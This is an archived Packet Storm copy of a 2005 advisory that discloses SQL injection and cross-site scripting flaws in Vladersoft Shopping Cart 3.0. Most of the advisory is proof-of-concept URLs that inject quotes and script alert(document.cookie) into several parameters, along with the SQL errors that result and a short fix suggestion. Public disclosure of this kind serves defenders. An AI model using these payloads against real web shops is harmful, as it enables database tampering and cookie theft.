what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

vladersoft30.txt

vladersoft30.txt
Posted Mar 29, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Vladersoft Shopping Cart version 3.0 is susceptible to multiple cross site scripting and SQL injection vulnerabilities. Sample exploitation provided.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | ff883a1159901250b604c992c505e6b30d38334d06fe39e24596c33f727d5e37

vladersoft30.txt

Change Mirror Download


Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: High
Title: Multiple sql injection, and xss vulnerabilities in Vladersoft Shopping Cart v.3.0
Date: March 27, 2005

Summary:
There are multiple sql injection, xss vulnerabilities in the Vladersoft Shopping Cart v.3.0.

Proof of Concept Exploits:
http://localhost/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION

Query: "SELECT * FROM categories WHERE CategoryID = ''SQL_INJECTION'"

Error 1064: You have an error in your SQL syntax near 'SQL_INJECTION'' at line 1


http://localhost/store/item.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION

Query: "SELECT * FROM options WHERE OptionItemID = ''SQL_INJECTION' ORDER BY OptionPrice ASC"

Error 1064: You have an error in your SQL syntax near 'SQL_INJECTION' ORDER BY OptionPrice ASC' at line 1


http://localhost/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang='SQL_INJECTION

Query: "SELECT CategoryID AS bookmarkID, CategoryName'SQL_INJECTION AS bookmarkName FROM categories WHERE CategoryID = '0'"

Error 1064: You have an error in your SQL syntax near '0'' at line 1


http://localhost/store/search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B464751

32&currency=USD

Query: "SELECT COUNT(*) FROM items AS I, categories AS C, categories_items AS CI WHERE CI.ItemID = I.ItemID AND CI.CategoryID =

C.CategoryID AND I.ItemStatus = '1' AND I.ItemIndexedWords LIKE '%'SQL_INJECTION%'"

Error 1064: You have an error in your SQL syntax near 'SQL_INJECTION%'' at line 8


http://localhost/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&s

id=CDFE279AC2AD08522DF1CF9B46475132&currency=USD

Query: "SELECT COUNT(*) FROM items AS I, categories AS C, categories_items AS CI WHERE CI.ItemID = I.ItemID AND CI.CategoryID =

C.CategoryID AND I.ItemStatus = '1' AND I.ItemIndexedWords LIKE '%%' AND CI.CategoryID = ''SQL_INJECTION'"

Error 1064: You have an error in your SQL syntax near 'SQL_INJECTION'' at line 8


http://localhost/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Pops cookie

http://localhost/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(documen

t.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD

Pops cookie

Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing

user input to the mysql database, or before echoing data on the screen, would solve these problems.

Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to

contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my

soon to come out book on Secure coding with php.
Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    23 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close